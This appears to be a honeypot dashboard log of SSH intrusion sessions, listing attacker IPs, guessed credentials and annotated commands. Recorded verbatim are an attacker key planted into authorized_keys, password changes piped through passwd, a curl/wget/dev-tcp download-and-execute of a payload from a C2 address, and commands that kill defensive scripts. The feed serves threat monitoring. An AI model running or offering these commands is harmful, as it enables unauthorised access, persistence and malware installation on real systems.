$ echo -e "mbs12!*!g#\nhYU0j5KLXH1s\nhYU0j5KLXH1s"|passwd|bash
$ Enter new UNIX password:
$ echo "mbs12!*!g#\nhYU0j5KLXH1s\nhYU0j5KLXH1s\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ stoic_silk_root (106.13.114.161) โ€” Beijing, China ยท 1 session ยท 20 cmds
2026-05-10 18:09 EDT ยท as oracle/P@ssw0rd
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "P@ssw0rd\nCxnooffUPJYu\nCxnooffUPJYu"|passwd|bash
$ Enter new UNIX password:
$ echo "P@ssw0rd\nCxnooffUPJYu\nCxnooffUPJYu\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ stoic_monsoon_root (3.111.219.98) โ€” Mumbai, India ยท 1 session ยท 1 cmd
2026-05-10 18:01 EDT ยท as admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ midnight_mango_root (124.109.2.211) โ€” Bangkok Yai, Thailand ยท 1 session ยท 2 cmds
2026-05-10 17:53 EDT ยท as oracle/123.com
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ sneaky_stein_root (95.208.74.83) โ€” Biberach an der Riss, Germany ยท 1 session ยท 2 cmds
2026-05-10 17:36 EDT ยท as oracle/oracle@123456
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ cryptic_phantom_root (185.216.134.126) โ€” Damascus, Syria ยท 2 sessions ยท 4 cmds
2026-05-09 23:37 EDT ยท as oracle/!QAZ2wsx, oracle/1q2w3e4r
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
๐ŸŽญ savage_yankee_root (209.99.184.143) โ€” San Francisco, United States ยท 1 session ยท 2 cmds
2026-05-10 13:23 EDT ยท as oracle/qazwsx
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ feral_silk_root (118.145.237.236) โ€” Haidian, China ยท 1 session ยท 20 cmds
2026-05-10 13:16 EDT ยท as oracle/Oracle123
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "Oracle123\nx2VAnRhAmY1D\nx2VAnRhAmY1D"|passwd|bash
$ Enter new UNIX password:
$ echo "Oracle123\nx2VAnRhAmY1D\nx2VAnRhAmY1D\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ vapor_steppe_root (185.16.214.226) โ€” Moscow, Russia ยท 1 session ยท 2 cmds
2026-05-10 12:52 EDT ยท as oracle/qazwsx
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ lurking_jade_root (120.55.36.109) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-05-10 11:18 EDT ยท as root/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ drowsy_tiger_root (20.235.157.149) โ€” Chennai, India ยท 1 session ยท 1 cmd
2026-05-10 10:39 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ grumpy_hanbok_root (211.186.79.173) โ€” Dalseong-gun, South Korea ยท 1 session ยท 2 cmds
2026-05-10 08:52 EDT ยท as oracle/ORACLE
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ unhinged_neon_root (47.243.90.117) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-05-10 08:27 EDT ยท as oracle/test1234
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ feral_monet (46.105.161.242) โ€” Roubaix, France ยท 1 session ยท 1 cmd
2026-05-10 07:56 EDT ยท as user/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ molten_panda_root_222 (101.201.233.222) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-05-10 07:18 EDT ยท as oracle/oracle123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ grumpy_panda_root (14.18.122.240) โ€” Guangzhou, China ยท 2 sessions ยท 22 cmds
2026-05-07 11:37 EDT ยท as oracle/Oracle2022, oracle/oracle21
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "Oracle2022\nSxwju46qS7Dj\nSxwju46qS7Dj"|passwd|bash
$ Enter new UNIX password:
$ echo "Oracle2022\nSxwju46qS7Dj\nSxwju46qS7Dj\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ derelict_echo_root (197.5.145.150) โ€” Tunis, Tunisia ยท 1 session ยท 2 cmds
2026-05-10 04:02 EDT ยท as oracle/os10+ZTE
file attribute tampering โ†’ SSH key persistence (repeated file attribute tampering 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ drowsy_wok_root_159 (59.36.80.159) โ€” Shenzhen, China ยท 1 session ยท 5 cmds
2026-05-10 03:45 EDT ยท as root/123456
echo โ†’ payload download from C2 โ†’ execute from /tmp โ†’ '8
$ echo 1 > /dev/null && cat /bin/echo
$ nohup $SHELL -c "curl http://202.21.121.216:8804/linux -o /tmp/hNy3QE85cG; if [ ! -f /tmp/hNy3QE85cG ]; then wget http://202.21.121.216:8804/linux -O /tmp/hNy3QE85cG; fi; if [ ! -f /tmp/hNy3QE85cG ]; then exec 6<>/dev/tcp/202.21.121.216/8804 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/hNy3QE85cG ; chmod +x /tmp/hNy3QE85cG && /tmp/hNy3QE85cG Iu7duzcHPYMuizwQKrvf+VlV+ti4JB07lDKOPgcxssL2V1n43Ls0ECyLMYMiGD2zwv1WTfzcuT4fPIswjywYNb/C/FBS4Nu8Khg7jDqMPBg0v8z9Wk3326Q2HTqUMog7Ez283f1DV/nCvTIHPogxlDgZPrzb/FND/9u8KhE0lDmUPRkysNX2VFTu3bs2Bz2INJQ/Giqy2/RVU//YvSQRIogxgiIbNr/C+lFZ+Ny7NBgsiDKKIhg8usL3Wk353bAyGT2KNZo+GTak3v9NUvzdpDYYOoA4gjwdJL7V4FFQ/MK4NBgiiDCKNhAxvd3uUlP4wrs2Bz2MMZQ9Hz2w2/hbUe7duDUHOIsujjwHNbve9FtR/d2qNx8iiDWJIhAqvdT0VVX91KoxECKJNpQ0GSq72fdZVfvVviQaNZQ5giIYNbjC/FNR9NS5MRwsjjeUNB8qu9v4TVH+1bAyGT2JM5o9GTKk3f1NUf3CuzAQNow4izUJNb3d4FBV4N6+Mwc9jzSANB42v8z6VE3/3rsqGDSOLos/ET6z1PxQQ//ZvSobPJQxjzUHMb7W9lpT+8y+Mwc+jjOUPRszpN36U1n43LswGiyOOZQ+Gjek3vpbTfvbsDIfP4MgizQZKr3a4FJQ+cK5MxM6ijGJOQk1u9jgUVH5wrsxHyKCOIA6HjayzPpUTfzfsyoYO4suiz0RPr3Z+FZD+NykNhk5lDKINAc1vNb3Vlv8zLsxGyKJMpQ+HTSk3fhUWffZvzIJNJQyizQHNrjZ4FdR9Nq6NRk9olgbVYLuBsacfArHht/3lsGisw==; fi; echo 123456 > /tmp/.opass; chmod +x /tmp/hNy3QE85cG && /tmp/hNy3QE85cG Iu7duzcHPYMuizwQKrvf+VlV+ti4JB07lDKOPgcxssL2V1n43Ls0ECyLMYMiGD2zwv1WTfzcuT4fPIswjywYNb/C/FBS4Nu8Khg7jDqMPBg0v8z9Wk3326Q2HTqUMog7Ez283f1DV/nCvTIHPogxlDgZPrzb/FND/9u8KhE0lDmUPRkysNX2VFTu3bs2Bz2INJQ/Giqy2/RVU//YvSQRIogxgiIbNr/C+lFZ+Ny7NBgsiDKKIhg8usL3Wk353bAyGT2KNZo+GTak3v9NUvzdpDYYOoA4gjwdJL7V4FFQ/MK4NBgiiDCKNhAxvd3uUlP4wrs2Bz2MMZQ9Hz2w2/hbUe7duDUHOIsujjwHNbve9FtR/d2qNx8iiDWJIhAqvdT0VVX91KoxECKJNpQ0GSq72fdZVfvVviQaNZQ5giIYNbjC/FNR9NS5MRwsjjeUNB8qu9v4TVH+1bAyGT2JM5o9GTKk3f1NUf3CuzAQNow4izUJNb3d4FBV4N6+Mwc9jzSANB42v8z6VE3/3rsqGDSOLos/ET6z1PxQQ//ZvSobPJQxjzUHMb7W9lpT+8y+Mwc+jjOUPRszpN36U1n43LswGiyOOZQ+Gjek3vpbTfvbsDIfP4MgizQZKr3a4FJQ+cK5MxM6ijGJOQk1u9jgUVH5wrsxHyKCOIA6HjayzPpUTfzfsyoYO4suiz0RPr3Z+FZD+NykNhk5lDKINAc1vNb3Vlv8zLsxGyKJMpQ+HTSk3fhUWffZvzIJNJQyizQHNrjZ4FdR9Nq6NRk9olgbVYLuBsacfArHht/3lsGisw==" &
โ†ณ payload download from C2
$ head -c 3716336 > /tmp/SWV4CQQL9j
โ†ณ execute from /tmp
$ echo 1 > /dev/null && cat /bin/echoQtd#0000
$ >A@/`'8
๐ŸŽญ midnight_lantern_root_67 (121.41.237.67) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-05-10 03:20 EDT ยท as root/12345678
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ aloof_nasi_root (47.250.59.60) โ€” Kuala Lumpur, Malaysia ยท 1 session ยท 1 cmd
2026-05-10 02:54 EDT ยท as root/1234
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ savage_dragon (120.26.200.10) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-05-09 22:34 EDT ยท as deploy/deploy123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ scrappy_wraith_db (213.154.77.61) โ€” Dakar, Senegal ยท 1 session ยท 2 cmds
2026-05-09 21:36 EDT ยท as oracle/oracle9i
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ silent_silk_root_107 (8.130.148.107) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-05-09 20:44 EDT ยท as admin/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ spectral_shadow_root_254 (107.189.13.254) โ€” Luxembourg, Luxembourg ยท 1 session ยท 3 cmds
2026-05-09 20:02 EDT ยท as admin/admin
CPU profiling โ†’ CPU profiling โ†’ ?
$ echo "bash --help; ls /proc/1/; cat /proc/1/mounts; cat /proc/cpuinfo; echo __1778371350188143739" | sh
โ†ณ CPU profiling
$ bash --help; ls /proc/1/; cat /proc/1/mounts; cat /proc/cpuinfo; echo __1778371350188143739
โ†ณ CPU profiling
$
๐ŸŽญ placid_spice_root (164.164.197.148) โ€” Bengaluru, India ยท 2 sessions ยท 4 cmds
2026-05-08 16:54 EDT ยท as oracle/Oracle2022, oracle/zaq1xsw2
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
๐ŸŽญ scrappy_liberty_root (69.74.29.21) โ€” New York, United States ยท 2 sessions ยท 21 cmds
2026-05-09 17:47 EDT ยท as oracle/manager, root/toor
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:hEYfOPBouzNn"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ hollow_cowboy_root_12 (47.185.144.12) โ€” Flower Mound, United States ยท 1 session ยท 5 cmds
2026-05-09 17:57 EDT ยท as root/root
ip โ†’ network mapping โ†’ OS/kernel identification โ†’ CPU profiling โ†’ ps
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
๐ŸŽญ arctic_panda_root (14.103.104.162) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-05-09 17:48 EDT ยท as tomcat/tomcat
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ crimson_kopi_root (43.160.253.60) โ€” Singapore, Singapore ยท 1 session ยท 1 cmd
2026-05-09 14:24 EDT ยท as deploy/deploy
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ baroque_static_root (185.71.233.73) โ€” Hoล™ovice, Czechia ยท 18 sessions ยท 66 cmds
2026-05-09 06:15 EDT ยท as admin/admin, root/root
apt-get โ†’ sudo โ†’ root โ†’ ? โ†’ admin (repeated apt-get 19x)
$ apt-get update -y ร—18
$ sudo apt-get update -y ร—18
$ root ร—16
$ ? ร—4
$ ร—8
$ admin ร—2
๐ŸŽญ stoic_oasis_root (193.123.90.235) โ€” Dubai, United Arab Emirates ยท 3 sessions ยท 6 cmds
2026-05-09 11:14 EDT ยท as oracle/Abcd1234, oracle/founderbn, oracle/passwd
file attribute tampering โ†’ SSH key persistence (repeated file attribute tampering 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—3
โ†ณ file attribute tampering
